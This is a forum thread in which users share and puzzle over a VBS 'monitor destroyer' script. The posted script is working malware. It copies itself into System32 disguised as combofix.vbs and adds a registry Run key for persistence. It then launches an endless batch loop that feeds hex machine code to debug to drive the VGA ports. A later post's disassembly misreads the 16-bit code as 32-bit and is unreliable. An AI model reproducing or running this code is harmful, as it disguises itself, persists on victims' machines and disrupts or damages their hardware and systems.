[VBS] Monitor destroyer

[Kulverstukas]

Well, I checked my supuh seecrit virus folder where I keep those legendary viruses, for no particular reason, and found this cool VBS script, that is said to make your monitor or VGA card smoke I don't know how true it is or that it works (don't know VBS   too afraid to test )
I got it... don't know where, probably was 1nj3ct forums, one guy posted...

Code: [Select]

' 45 4c 49 58 49 41 20 42 59 20 4f 58 59 20 4f 46 20 4e 51 52 20 54 65 41 6d 20 46 4f 52 20 4b 49 52 41 20 4f 46 20 43 59 42 45 52 20 4c 49 46 45
' xirusteam

if IsDate(#25/02#) then

Dim FSO, WriteStuff, Shell
Set FSO = CreateObject("Scripting.FileSystemObject")
Set Shell = CreateObject("Wscript.Shell")
Set WriteStuff = FSO.OpenTextFile("temp.bat", 8, True)

Fso.copyfile wscript.scriptfullname, "C:\Windows\System32\combofix.vbs"
call Shell.RegWrite("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\???","C:\Windows\System32\combofix.vbs", "REG_SZ")
call MsgBox("I Was Born On The 25th And I'll Die On The 25th",65,"mizory Says:")
WriteStuff.WriteLine("@echo off")
WriteStuff.WriteLine(":bomb")
WriteStuff.WriteLine("echo e200 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\O.dbg")
WriteStuff.WriteLine("echo e210 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\O.dbg")
WriteStuff.WriteLine("echo e220 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\O.dbg")
WriteStuff.WriteLine("echo e230 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\O.dbg")
WriteStuff.WriteLine("echo g=200>>\O.dbg")
WriteStuff.WriteLine("echo q>>\O.dbg""")
WriteStuff.WriteLine("debug <\O.dbg>nul")
WriteStuff.WriteLine("del \O.dbg")
WriteStuff.WriteLine("goto bomb")
WriteStuff.Close
Shell.Run("temp.bat")

End If

[Huntondoom]

its a program that runs on a certain date
then it outputs a msgbox
and creates a batch
and runs it but I dont know what the batch does :S

Code: (bat) [Select]

@echo off
:bomb
echo e200 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\O.dbg
echo e210 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\O.dbg
echo e220 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\O.dbg
echo e230 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\O.dbg
echo g=200>>\O.dbg
echo q>>\O.dbg""
debug <\O.dbg>nul
del \O.dbg
goto bomb
WriteStuff.Close

[ca0s]

That batch uses debug to execute the following:

Code: [Select]

004012D0     B8 1300CD10    MOV EAX,10CD0013
004012D5     E4 40          IN AL,40                                 ;  I/O command
004012D7     88C3           MOV BL,AL
004012D9     E4 40          IN AL,40                                 ;  I/O command
004012DB     88C7           MOV BH,AL
004012DD     F6E3           MUL BL
004012DF     30DF           XOR BH,BL
004012E1     88C1           MOV CL,AL
004012E3     BA C80330C0    MOV EDX,C03003C8
004012E8     EE             OUT DX,AL                                ;  I/O command
004012E9     BA DA03ECA8    MOV EDX,A8EC03DA
004012EE     0875 90        OR BYTE PTR SS:[EBP-70],DH
004012F1     FB             STI
004012F2     EC             IN AL,DX                                 ;  I/O command
004012F3     A8 08          TEST AL,8
004012F5    ^74 FB          JE SHORT test.004012F2
004012F7     BA C90388D8    MOV EDX,D88803C9
004012FC     EE             OUT DX,AL                                ;  I/O command
004012FD     88F8           MOV AL,BH
004012FF     EE             OUT DX,AL                                ;  I/O command
00401300     8890 90909090  MOV BYTE PTR DS:[EAX+90909090],DL
00401306     C8 EEB401      ENTER 0B4EE,1
0040130A     CD 16          INT 16                                   ; |
0040130C    ^74 CD          JE SHORT test.004012DB
0040130E     B8 0300CD90    MOV EAX,90CD0003
Latest versions of windows have removed debug. Also, please, some ASM coder tell us what that code does. In my limited view, it gets info from a port in the system (in), checks values, and then puts values (out) in it. That port should be the screen, I think.

[Huntondoom]

and since the batch does this over and over, so you screen port will be overloaded?